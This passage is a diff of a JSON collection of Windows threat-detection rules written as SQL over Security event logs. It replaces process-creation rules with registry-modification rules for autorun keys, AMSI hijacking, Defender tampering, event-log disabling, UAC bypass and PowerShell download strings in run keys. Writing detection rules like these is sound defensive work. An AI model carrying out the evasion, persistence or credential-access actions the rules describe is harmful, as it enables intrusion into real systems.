- "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\setres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\choice' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.com%' ESCAPE '\\' OR NewValue LIKE '%C:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_setres.yml" + "filename": "registry_set_cve_2020_1048_new_printer_port.yml" }, { - "title": "Suspicious Office Token Search Via CLI", - "id": "6d3a3952-6530-44a3-8554-cf17c116c615", - "status": "experimental", - "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Session Manager Autorun Keys Modification", + "id": "046218bd-e0d8-4113-a3c3-895a12b2b298", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.persistence", + "attack.t1547.001", + "attack.t1546.009" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%eyJ0eXAiOi%' ESCAPE '\\' OR CommandLine LIKE '% eyJ0eX%' ESCAPE '\\' OR CommandLine LIKE '% \"eyJ0eX\"%' ESCAPE '\\' OR CommandLine LIKE '% ''eyJ0eX''%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\SetupExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\S0InitialCommand%' ESCAPE '\\' OR TargetObject LIKE '%\\\\KnownDlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Execute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppCertDlls%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" ], - "filename": "proc_creation_win_susp_office_token_search.yml" + "filename": "registry_set_asep_reg_keys_modification_session_manager.yml" }, { - "title": "Remote Access Tool - AnyDesk Piped Password Via CLI", - "id": "b1377339-fda6-477a-b455-ac0923f9ec2c", + "title": "CurrentControlSet Autorun Keys Modification", + "id": "f674e36a-4b91-431e-8aef-f8a96c2aca35", "status": "experimental", - "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate piping of the password to anydesk", - "Some FP could occur with similar tools that uses the same command line '--set-password'" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%echo %' ESCAPE '\\' AND CommandLine LIKE '%.exe --set-password%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SecurityProviders\\\\SecurityProviders%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Monitors%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NetworkProvider\\\\Order%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Notification Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Authentication Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootVerificationProgram\\\\ImagePath%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor%' ESCAPE '\\' AND (NewValue LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' OR NewValue LIKE 'CutePDF Writer' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%Print\\\\Monitors\\\\Appmon\\\\Ports\\\\Microsoft.Office.OneNote\\_%' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider\\\\Order\\\\ProviderOrder' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver' ESCAPE '\\' AND NewValue = 'VNCpm.dll')))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml" + "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml" }, { - "title": "Suspicious IIS URL GlobalRules Rewrite Via AppCmd", - "id": "7c8af9b2-dcae-41a2-a9db-b28c288b5f08", + "title": "UAC Bypass via Event Viewer - Registry Set", + "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", "status": "experimental", - "description": "Detects usage of \"appcmd\" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects UAC bypass method using Windows event viewer", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate usage of appcmd to add new URL rewrite rules" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:system.webServer/rewrite/globalRules%' ESCAPE '\\' AND CommandLine LIKE '%commit:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "proc_creation_win_iis_appcmd_susp_rewrite_rule.yml" + "filename": "registry_set_uac_bypass_eventvwr.yml" }, { - "title": "Fsutil Suspicious Invocation", - "id": "add64136-62e5-48ea-807e-88638d02df1e", - "status": "stable", - "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", - "author": "Ecco, E.M. Anhaus, oscd.community", + "title": "Disable Exploit Guard Network Protection on Windows Defender", + "id": "bf9e1387-b040-4393-9851-1598f8ecfae9", + "status": "experimental", + "description": "Detects disabling Windows Defender Exploit Guard Network Protection", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.t1562.001" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\App and Browser protection\\\\DisallowExploitProtectionOverride%' ESCAPE '\\' AND NewValue = 'DWORD (00000001)')" ], - "filename": "proc_creation_win_fsutil_usage.yml" + "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" }, { - "title": "Mustang Panda Dropper", - "id": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", - "status": "test", - "description": "Detects specific process parameters as used by Mustang Panda droppers", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Disable Tamper Protection on Windows Defender", + "id": "93d298a1-d28f-47f1-a468-d971e7796679", + "status": "experimental", + "description": "Detects disabling Windows Defender Tamper Protection", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Temp\\\\wtask.exe /create%' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-3,1\\%\\%PUBLIC:~-9,1\\%%' ESCAPE '\\' OR CommandLine LIKE '%/tn \"Security Script %' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-1,1\\%%' ESCAPE '\\') OR (CommandLine LIKE '%/E:vbscript%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\' AND CommandLine LIKE '%/F%' ESCAPE '\\') OR NewProcessName LIKE '%Temp\\\\winwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Features\\\\TamperProtection%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_mustangpanda.yml" + "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml" }, { - "title": "Fake Instance Of Hxtsr.exe", - "id": "4e762605-34a8-406d-b72e-c1a089313320", + "title": "Suspicious Service Installed", + "id": "f2485272-a156-4773-82d7-1d178bc4905b", "status": "test", - "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.\nHxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\".\nIts path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\".\nAny instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe\n", - "author": "Sreeman", + "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.t1562.001", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName = 'hxtsr.exe' AND NOT (CurrentDirectory LIKE 'C:\\\\program files\\\\windowsapps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND CurrentDirectory LIKE '%\\\\hxtsr.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\NalDrv\\\\ImagePath' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PROCEXP152\\\\ImagePath' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\') AND NewValue LIKE '%\\\\WINDOWS\\\\system32\\\\Drivers\\\\PROCEXP152.SYS%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hxtsr_masquerading.yml" + "filename": "registry_set_susp_service_installed.yml" }, { - "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet", - "id": "435e10e4-992a-4281-96f3-38b11106adde", + "title": "Potential AMSI COM Server Hijacking", + "id": "160d2780-31f7-4922-8b3a-efce30e63e96", "status": "experimental", - "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADComputer %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_computer_discovery_get_adcomputer.yml" + "filename": "registry_set_amsi_com_hijack.yml" }, { - "title": "Renamed FTP.EXE Execution", - "id": "277a4393-446c-449a-b0ed-7fdc7795244c", + "title": "Blackbyte Ransomware Registry", + "id": "83314318-052a-4c90-a1ad-660ece38d276", "status": "test", - "description": "Detects the execution of a renamed \"ftp.exe\" binary based on the PE metadata fields", - "author": "Victor Sergeev, oscd.community", + "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059", "attack.defense_evasion", - "attack.t1202" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'ftp.exe' AND NOT (NewProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_renamed_ftp.yml" + "filename": "registry_set_blackbyte_ransomware.yml" }, { - "title": "Firewall Rule Deleted Via Netsh.EXE", - "id": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", + "title": "Disable Windows Event Logging Via Registry", + "id": "2f78da12-f7c7-430b-8b19-a28f269b77a3", "status": "experimental", - "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", - "author": "frack113", + "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1562.002" ], "falsepositives": [ - "Legitimate administration activity", - "Software installations and removal" + "Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%delete %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND CommandLine LIKE '%name=Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Enabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE '%\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-FileInfoMinifilter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-ASN1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Kernel-AppCompat\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Runtime\\\\Error\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-CAPI2/Operational\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Compat-Appraiser%' ESCAPE '\\'))) AND NOT ((NewProcessName = '') OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_netsh_fw_delete_rule.yml" + "filename": "registry_set_disable_winevt_logging.yml" }, { - "title": "WSF/JSE/JS/VBA/VBE File Execution", - "id": "1e33157c-53b1-41ad-bbcc-780b80b58288", - "status": "test", - "description": "Detects suspicious file execution by wscript and cscript", - "author": "Michael Haag", + "title": "Suspicious Powershell In Registry Run Keys", + "id": "8d85cf08-bf97-4260-ba49-986a2a65129c", + "status": "experimental", + "description": "Detects potential PowerShell commands or code within registry run keys", + "author": "frack113, Florian Roth", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." + "Legitimate admin or third party scripts. Baseline according to your environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('wscript.exe', 'cscript.exe') OR (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND (NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%pwsh %' ESCAPE '\\' OR NewValue LIKE '%FromBase64String%' ESCAPE '\\' OR NewValue LIKE '%.DownloadFile(%' ESCAPE '\\' OR NewValue LIKE '%.DownloadString(%' ESCAPE '\\' OR NewValue LIKE '% -w hidden %' ESCAPE '\\' OR NewValue LIKE '% -w 1 %' ESCAPE '\\' OR NewValue LIKE '%-windowstyle hidden%' ESCAPE '\\' OR NewValue LIKE '%-window hidden%' ESCAPE '\\' OR NewValue LIKE '% -nop %' ESCAPE '\\' OR NewValue LIKE '% -encodedcommand %' ESCAPE '\\' OR NewValue LIKE '%-ExecutionPolicy Bypass%' ESCAPE '\\' OR NewValue LIKE '%Invoke-Expression%' ESCAPE '\\' OR NewValue LIKE '%IEX (%' ESCAPE '\\' OR NewValue LIKE '%Invoke-Command%' ESCAPE '\\' OR NewValue LIKE '%ICM -%' ESCAPE '\\' OR NewValue LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR NewValue LIKE '%IWR %' ESCAPE '\\' OR NewValue LIKE '% -noni %' ESCAPE '\\' OR NewValue LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_script_execution.yml" + "filename": "registry_set_powershell_in_run_keys.yml" }, { - "title": "Suspicious Sigverif Execution", - "id": "7d4aaec2-08ed-4430-8b96-28420e030e04", + "title": "New Root or CA or AuthRoot Certificate to Store", + "id": "d223b46b-5621-4037-88fe-fda32eead684", "status": "experimental", - "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sigverif.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Blob' ESCAPE '\\' AND NewValue = 'Binary Data')" ], - "filename": "proc_creation_win_lolbin_sigverif.yml" + "filename": "registry_set_install_root_or_ca_certificat.yml" }, { - "title": "Potential PowerShell Downgrade Attack", - "id": "b3512211-c67e-4707-bedc-66efc7848863", - "status": "test", - "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", - "author": "Harish Segar (rule)", + "title": "Scripted Diagnostics Turn Off Check Enabled - Registry", + "id": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", + "status": "experimental", + "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' AND (CommandLine LIKE '% -version 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versio 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versi 2 %' ESCAPE '\\' OR CommandLine LIKE '% -vers 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ver 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ve 2 %' ESCAPE '\\' OR CommandLine LIKE '% -v 2 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\ScriptedDiagnostics\\\\TurnOffCheck' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_powershell_downgrade_attack.yml" + "filename": "registry_set_enabling_turnoffcheck.yml" }, { - "title": "Possible Privilege Escalation via Weak Service Permissions", - "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", - "status": "test", - "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", - "author": "Teymur Kheirkhabarov", + "title": "Disable Privacy Settings Experience in Registry", + "id": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", + "status": "experimental", + "description": "Detects registry modifications that disable Privacy Settings Experience", + "author": "frack113", "tags": [ - "attack.persistence", 